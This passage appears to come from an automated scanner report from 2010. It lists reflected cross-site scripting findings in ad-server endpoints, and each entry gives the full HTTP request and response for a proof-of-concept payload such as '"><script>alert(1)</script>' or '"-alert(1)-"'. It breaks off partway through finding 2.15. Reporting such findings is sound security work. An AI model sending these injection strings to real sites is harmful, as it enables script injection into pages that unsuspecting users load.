This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /iframe!t=317!?che=3133643&clk0=http://ad.vulnerable.ad.partner/click%3Bh%3Dv8/3a57/7/13d/%2a/l%3B228278285%3B0-0%3B0%3B56591511%3B4307-300/250%3B38141576/38159333/1%3B%3B%7Esscs%3D%3fhttp://global.ard.yahoo.com/SIG=15nntbav7/M=782480.14428767.14283337.1442997/D=news/S=81121452:LREC/Y=YAHOO/EXP=1290214422/L=C2BmnkLEatn9SQS9TNcPQybLrnoX2kzm__YABG.H/B=nirsAUJe5i0-/J=1290207222312406/K=UBe7wFxsCvrgwq9VTCRZWQ/A=6254463/R=0/*http://clk.redcated/goiframe/191362211.191524283/273561243/direct/01%3fhref=http://ad.vulnerable.ad.partner/clk;228265252;52145443;b?b5546"%3balert(1)//a772291970e&ct=US&st=TX&ac=713&zp=77002&bw=4&dma=99&city=13248 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://vulnerable.verizon.host/adi/rmm.msnbc/carvingboard_300x250_c;sz=300x250;ord=183876105?click=http://global.ard.yahoo.com/SIG=15nntbav7/M=782480.14428767.14283337.1442997/D=news/S=81121452:LREC/Y=YAHOO/EXP=1290214422/L=C2BmnkLEatn9SQS9TNcPQybLrnoX2kzm__YABG.H/B=nirsAUJe5i0-/J=1290207222312406/K=UBe7wFxsCvrgwq9VTCRZWQ/A=6254463/R=0/*http://clk.redcated/goiframe/191362211.191524283/273561243/direct/01%3fhref=
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.aggregateknowledge.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=78036424337708989; Version=1; Domain=.aggregateknowledge.com; Max-Age=157680000; Expires=Wed, 18-Nov-2015 23:32:52 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=5|0BApXXOQAAAAAAAEAPgEAVgEA9wEQAAEAEwECkW5AAQA%2Bfg4BrSfwIIQgAAAAAAAAASAAAAAAAAAA9wAAAAAAAABWAOAAAA%3D%3D; Version=1; Domain=.aggregateknowledge.com; Max-Age=63072000; Expires=Sun, 18-Nov-2012 23:32:52 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Fri, 19 Nov 2010 23:32:51 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
/B=nirsAUJe5i0-/J=1290207222312406/K=UBe7wFxsCvrgwq9VTCRZWQ/A=6254463/R=0/*http://clk.redcated/goiframe/191362211.191524283/273561243/direct/01?href=http://ad.doubleclick.net/clk;228265252;52145443;b?b5546";alert(1)//a772291970ehttp://ad.aggregateknowledge.com/interaction!che=1390802481?imid=1009278178551694368&ipid=288&caid=62&cgid=86&crid=247&a=CLICK&adid=224&status=0&l=http%3A%2F%2Fbricks.coupons.com%2Fstart.asp%3Ftqnm%3Dz
...[SNIP]...

2.8. http://ad.aggregateknowledge.com/iframe!t=317! [clk0 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.aggregateknowledge.com
Path:   /iframe!t=317!

Issue detail

The value of the clk0 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f766a"><script>alert(1)</script>38e82e8f2db was submitted in the clk0 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframe!t=317!?che=3133643&clk0=http://ad.vulnerable.ad.partner/click%3Bh%3Dv8/3a57/7/13d/%2a/l%3B228278285%3B0-0%3B0%3B56591511%3B4307-300/250%3B38141576/38159333/1%3B%3B%7Esscs%3D%3fhttp://global.ard.yahoo.com/SIG=15nntbav7/M=782480.14428767.14283337.1442997/D=news/S=81121452:LREC/Y=YAHOO/EXP=1290214422/L=C2BmnkLEatn9SQS9TNcPQybLrnoX2kzm__YABG.H/B=nirsAUJe5i0-/J=1290207222312406/K=UBe7wFxsCvrgwq9VTCRZWQ/A=6254463/R=0/*http://clk.redcated/goiframe/191362211.191524283/273561243/direct/01%3fhref=http://ad.vulnerable.ad.partner/clk;228265252;52145443;b?f766a"><script>alert(1)</script>38e82e8f2db&ct=US&st=TX&ac=713&zp=77002&bw=4&dma=99&city=13248 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://vulnerable.verizon.host/adi/rmm.msnbc/carvingboard_300x250_c;sz=300x250;ord=183876105?click=http://global.ard.yahoo.com/SIG=15nntbav7/M=782480.14428767.14283337.1442997/D=news/S=81121452:LREC/Y=YAHOO/EXP=1290214422/L=C2BmnkLEatn9SQS9TNcPQybLrnoX2kzm__YABG.H/B=nirsAUJe5i0-/J=1290207222312406/K=UBe7wFxsCvrgwq9VTCRZWQ/A=6254463/R=0/*http://clk.redcated/goiframe/191362211.191524283/273561243/direct/01%3fhref=
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.aggregateknowledge.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=652248541896494258; Version=1; Domain=.aggregateknowledge.com; Max-Age=157680000; Expires=Wed, 18-Nov-2015 23:32:52 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=5|0BApXXOQAAAAAAAEAPgEAVgEA9wEQAAEAEwECkW5AAQA%2BfnqetjsJ49hvAAAAAAAAASAAAAAAAAAA9wAAAAAAAABWAOAAAA%3D%3D; Version=1; Domain=.aggregateknowledge.com; Max-Age=63072000; Expires=Sun, 18-Nov-2012 23:32:52 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Fri, 19 Nov 2010 23:32:52 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
/B=nirsAUJe5i0-/J=1290207222312406/K=UBe7wFxsCvrgwq9VTCRZWQ/A=6254463/R=0/*http://clk.redcated/goiframe/191362211.191524283/273561243/direct/01?href=http://ad.doubleclick.net/clk;228265252;52145443;b?f766a"><script>alert(1)</script>38e82e8f2dbhttp://ad.aggregateknowledge.com/interaction!che=986665669?imid=8835699883632744559&ipid=288&caid=62&cgid=86&crid=247&a=CLICK&adid=224&status=0&l=http%3A%2F%2Fbricks.coupons.com%2Fstart.asp%3Ftqnm%3Dzj
...[SNIP]...

2.9. http://vulnerable.verizon.host/adi/N2883.158901.DATAXU.COM/B4947916 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.verizon.host
Path:   /adi/N2883.158901.DATAXU.COM/B4947916

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 69d29'-alert(1)-'825c464d51d was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N2883.158901.DATAXU.COM/B4947916;sz=69d29'-alert(1)-'825c464d51d HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://cdn.w55c.net/i/0Rm4TKIov5_418275004.html?rtbhost=174.36.140.30&btid=NWI2MDdjZDQ3MDdjZDE3YmEyZTJhYjAzZWE4NjU4MWQ0MWRjMDAzZnxkNzE0ZTYxYS01MjFmLTQ0MGYtOGNjMS1kMGZkM2E4OWViZGN8MTI5MDM1MTU5OTM1N3wxfDBGM3o2U0RnY1N8MFJtNFRLSW92NXw1ODU4MDljNS0yOGM1LTQ4NDgtYTk5Yy03ZjRmOTIzN2YwNzc&ei=RUBICON&wp_exchange=13BB115E7425D128&euid=MDU2NThmMzEyMjJkNjQ2OWJhNDcxZWI4ZmQ5NGM1ZjZhODcyNjE0NQ&slotid=MQ&fiu=MEYzejZTRGdjUw&ciu=MFJtNFRLSW92NQ&reqid=NWI2MDdjZDQ3MDdjZDE3YmEyZTJhYjAzZWE4NjU4MWQ0MWRjMDAzZg&ccw=SUFCMjQjMC4w&epid=&bp=5500&dv=&dm=&os=&scres=&gen=&age=&zc=NzcwMDI&s=http%3A%2F%2Fadserver.adtechus.com%2Fadiframe%2F3.0%2F5235%2F1131606%2F0%2F154%2FADTECH%3Bcookie%3Dinfo%3Btarget%3D_blank%3Bkey%3Dkey1%2Bkey2%2Bkey3%2Bkey4%3Bgrp%3D000001&refurl=
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: vulnerable.verizon.host
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: id=c8e26c52e00001b|690327/426441/14933,2760581/556004/14933,2579983/257817/14932,2656259/943985/14932,2881371/1000549/14932,2761768/953351/14932|t=1290036089|et=730|cs=cudexktl

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 31682
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 21 Nov 2010 15:00:17 GMT
Expires: Sun, 21 Nov 2010 15:00:17 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects)
...[SNIP]...
g=1;v=1;pid=55638658;aid=231616750;ko=0;cid=34790382;rid=34808260;rv=1;rn=4921510;";
this.swfParams = 'sid=964168&aid=231616750&cid=34790382&pid=55638658&src=1762894&rv=1&rid=34808260&=69d29'-alert(1)-'825c464d51d&';
this.renderingId = "34808260";
this.previewMode = (("%PreviewMode" == "true") ? true : false);
this.debugEventsMode = (("%DebugEventsMode" == "true")
...[SNIP]...

2.10. http://vulnerable.verizon.host/adi/N3405.Sympatico.ca/B5011284.3 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.verizon.host
Path:   /adi/N3405.Sympatico.ca/B5011284.3

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6ebe8"-alert(1)-"51601b54316 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3405.Sympatico.ca/B5011284.3;sz=728x90;ord=195270203?click=http://bellcan.adbureau.net/accipiter/adclick/CID=0000054a95554fdf00000000/vibe=1/AAMSZ=728x90/SITE=ENSYMP.NEWS/AAMGNRC1=AdManagerResponse/area=HUBPAGE/ACC_RANDOM=8450819519/pageid=5839294491/relocate=http://clk.redcated/goiframe/191227999.191250938/164327256/direct/01%3fhref=&6ebe8"-alert(1)-"51601b54316=1 HTTP/1.1
Host: vulnerable.verizon.host
Proxy-Connection: keep-alive
Referer: http://redcated/D21/iview/164327256/direct;wi.728;hi.90/01/8450819519?click=http://bellcan.adbureau.net/accipiter/adclick/CID=0000054a95554fdf00000000/vibe=1/AAMSZ=728x90/SITE=ENSYMP.NEWS/AAMGNRC1=AdManagerResponse/area=HUBPAGE/ACC_RANDOM=8450819519/pageid=5839294491/relocate=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=228ef07ef3000058|2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2676521/1030425/14921,2199899/552974/14921,1359549/451737/14921,2587594/917522/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:07:33 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6974

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
e=1/AAMSZ=728x90/SITE=ENSYMP.NEWS/AAMGNRC1=AdManagerResponse/area=HUBPAGE/ACC_RANDOM=8450819519/pageid=5839294491/relocate=http://clk.redcated/goiframe/191227999.191250938/164327256/direct/01%3fhref=&6ebe8"-alert(1)-"51601b54316=1http%3a%2f%2frbc.bridgetrack.com/bank/_redir.htm%3FBTData%3D6021A7B776679675D54424BB7A2A5AFA09E9D9F81FEFBF8F3F4C2A01B149%26BT_TRF%3D11030%26ASC%3DAD0028");
var fscUrl = url;
var fscUrlClickTagFound
...[SNIP]...

2.11. http://vulnerable.verizon.host/adi/N3405.Sympatico.ca/B5011284.3 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.verizon.host
Path:   /adi/N3405.Sympatico.ca/B5011284.3

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6e0da"-alert(1)-"8fdfe6c6257 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3405.Sympatico.ca/B5011284.3;sz=728x90;ord=195270203?click=http://bellcan.adbureau.net/accipiter/adclick/CID=0000054a95554fdf00000000/vibe=1/AAMSZ=728x90/SITE=ENSYMP.NEWS/AAMGNRC1=AdManagerResponse/area=HUBPAGE/ACC_RANDOM=8450819519/pageid=5839294491/relocate=http://clk.redcated/goiframe/191227999.191250938/164327256/direct/01%3fhref=6e0da"-alert(1)-"8fdfe6c6257 HTTP/1.1
Host: vulnerable.verizon.host
Proxy-Connection: keep-alive
Referer: http://redcated/D21/iview/164327256/direct;wi.728;hi.90/01/8450819519?click=http://bellcan.adbureau.net/accipiter/adclick/CID=0000054a95554fdf00000000/vibe=1/AAMSZ=728x90/SITE=ENSYMP.NEWS/AAMGNRC1=AdManagerResponse/area=HUBPAGE/ACC_RANDOM=8450819519/pageid=5839294491/relocate=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=228ef07ef3000058|2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2676521/1030425/14921,2199899/552974/14921,1359549/451737/14921,2587594/917522/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:07:02 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6899

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
be=1/AAMSZ=728x90/SITE=ENSYMP.NEWS/AAMGNRC1=AdManagerResponse/area=HUBPAGE/ACC_RANDOM=8450819519/pageid=5839294491/relocate=http://clk.redcated/goiframe/191227999.191250938/164327256/direct/01%3fhref=6e0da"-alert(1)-"8fdfe6c6257http://rbc.bridgetrack.com/bank/_redir.htm?BTData=6021A7B776679675D54424BB7A2A5AFA09C9D9F81FEFBF8F3F4C2AE0B149&BT_TRF=11030&ASC=AD0033");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode
...[SNIP]...

2.12. http://vulnerable.verizon.host/adi/N3995.275551.SYMPATICOCANADA/B5002719 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.verizon.host
Path:   /adi/N3995.275551.SYMPATICOCANADA/B5002719

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f2d6"-alert(1)-"3d73acd9ef9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3995.275551.SYMPATICOCANADA/B5002719;sz=300x250;ord=181825700?click=http://bellcan.adbureau.net/accipiter/adclick/CID=0000054795554fdf00000000/vibe=1/AAMSZ=300x250/SITE=ENSYMP.NEWS/AAMGNRC1=AdManagerResponse/area=HUBPAGE/ACC_RANDOM=8450819519/pageid=5839294491/relocate=http://clk.redcated/goiframe/189498318.189844667/164326682/direct/01%3fhref=&7f2d6"-alert(1)-"3d73acd9ef9=1 HTTP/1.1
Host: vulnerable.verizon.host
Proxy-Connection: keep-alive
Referer: http://redcated/D21/iview/164326682/direct;wi.300;hi.250/01/8450819519?click=http://bellcan.adbureau.net/accipiter/adclick/CID=0000054795554fdf00000000/vibe=1/AAMSZ=300x250/SITE=ENSYMP.NEWS/AAMGNRC1=AdManagerResponse/area=HUBPAGE/ACC_RANDOM=8450819519/pageid=5839294491/relocate=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=228ef07ef3000058|2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2676521/1030425/14921,2199899/552974/14921,1359549/451737/14921,2587594/917522/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:08:22 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6687

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
=1/AAMSZ=300x250/SITE=ENSYMP.NEWS/AAMGNRC1=AdManagerResponse/area=HUBPAGE/ACC_RANDOM=8450819519/pageid=5839294491/relocate=http://clk.redcated/goiframe/189498318.189844667/164326682/direct/01%3fhref=&7f2d6"-alert(1)-"3d73acd9ef9=1http%3a%2f%2fwww.hotels.ca/hotel-deals/SLMcoupon_mms-444");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWi
...[SNIP]...

2.13. http://vulnerable.verizon.host/adi/N3995.275551.SYMPATICOCANADA/B5002719 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.verizon.host
Path:   /adi/N3995.275551.SYMPATICOCANADA/B5002719

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4d262"-alert(1)-"96f8deb7f41 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3995.275551.SYMPATICOCANADA/B5002719;sz=300x250;ord=181825700?click=http://bellcan.adbureau.net/accipiter/adclick/CID=0000054795554fdf00000000/vibe=1/AAMSZ=300x250/SITE=ENSYMP.NEWS/AAMGNRC1=AdManagerResponse/area=HUBPAGE/ACC_RANDOM=8450819519/pageid=5839294491/relocate=http://clk.redcated/goiframe/189498318.189844667/164326682/direct/01%3fhref=4d262"-alert(1)-"96f8deb7f41 HTTP/1.1
Host: vulnerable.verizon.host
Proxy-Connection: keep-alive
Referer: http://redcated/D21/iview/164326682/direct;wi.300;hi.250/01/8450819519?click=http://bellcan.adbureau.net/accipiter/adclick/CID=0000054795554fdf00000000/vibe=1/AAMSZ=300x250/SITE=ENSYMP.NEWS/AAMGNRC1=AdManagerResponse/area=HUBPAGE/ACC_RANDOM=8450819519/pageid=5839294491/relocate=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=228ef07ef3000058|2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2676521/1030425/14921,2199899/552974/14921,1359549/451737/14921,2587594/917522/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:07:43 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6657

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
e=1/AAMSZ=300x250/SITE=ENSYMP.NEWS/AAMGNRC1=AdManagerResponse/area=HUBPAGE/ACC_RANDOM=8450819519/pageid=5839294491/relocate=http://clk.redcated/goiframe/189498318.189844667/164326682/direct/01%3fhref=4d262"-alert(1)-"96f8deb7f41http://www.hotels.ca/hotel-deals/SLMcoupon_mms-444");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "
...[SNIP]...

2.14. http://vulnerable.verizon.host/adi/N6080.149339.8804879051621/B4137193.79 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.verizon.host
Path:   /adi/N6080.149339.8804879051621/B4137193.79

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aec59"-alert(1)-"5a20f033947 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N6080.149339.8804879051621/B4137193.79;sz=180x150;ord=101273807?click=http://global.ard.yahoo.com/SIG=15m7sl0eq/M=782480.14428769.14283335.8781275/D=news/S=81121452:REC/Y=YAHOO/EXP=1290214422/L=C2BmnkLEatn9SQS9TNcPQybLrnoX2kzm__YABG.H/B=nyrsAUJe5i0-/J=1290207222312406/K=UBe7wFxsCvrgwq9VTCRZWQ/A=6254462/R=0/*http://clk.redcated/goiframe/188992223.176758052/yhxxxdrv0010001133apm/direct/01?href=&aec59"-alert(1)-"5a20f033947=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://redcated/APM/iview/yhxxxdrv0010001133apm/direct;wi.180;hi.150/01?time=0.14199027403169878&click=http://global.ard.yahoo.com/SIG=15m7sl0eq/M=782480.14428769.14283335.8781275/D=news/S=81121452:REC/Y=YAHOO/EXP=1290214422/L=C2BmnkLEatn9SQS9TNcPQybLrnoX2kzm__YABG.H/B=nyrsAUJe5i0-/J=1290207222312406/K=UBe7wFxsCvrgwq9VTCRZWQ/A=6254462/R=0/*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: vulnerable.verizon.host
Proxy-Connection: Keep-Alive
Cookie: id=c8e26c52e00001b|2761768/953351/14932|t=1290036089|et=730|cs=cudexktl

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Fri, 19 Nov 2010 23:27:07 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6742

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
BmnkLEatn9SQS9TNcPQybLrnoX2kzm__YABG.H/B=nyrsAUJe5i0-/J=1290207222312406/K=UBe7wFxsCvrgwq9VTCRZWQ/A=6254462/R=0/*http://clk.redcated/goiframe/188992223.176758052/yhxxxdrv0010001133apm/direct/01?href=&aec59"-alert(1)-"5a20f033947=1http%3a%2f%2flp.21st.com/sp/%3Fpid%3D10486EYBDWK");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "
...[SNIP]...

2.15. http://vulnerable.verizon.host/adi/N6080.149339.8804879051621/B4137193.79 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.verizon.host
Path:   /adi/N6080.149339.8804879051621/B4137193.79

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c1c1"-alert(1)-"afd3afa7698 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

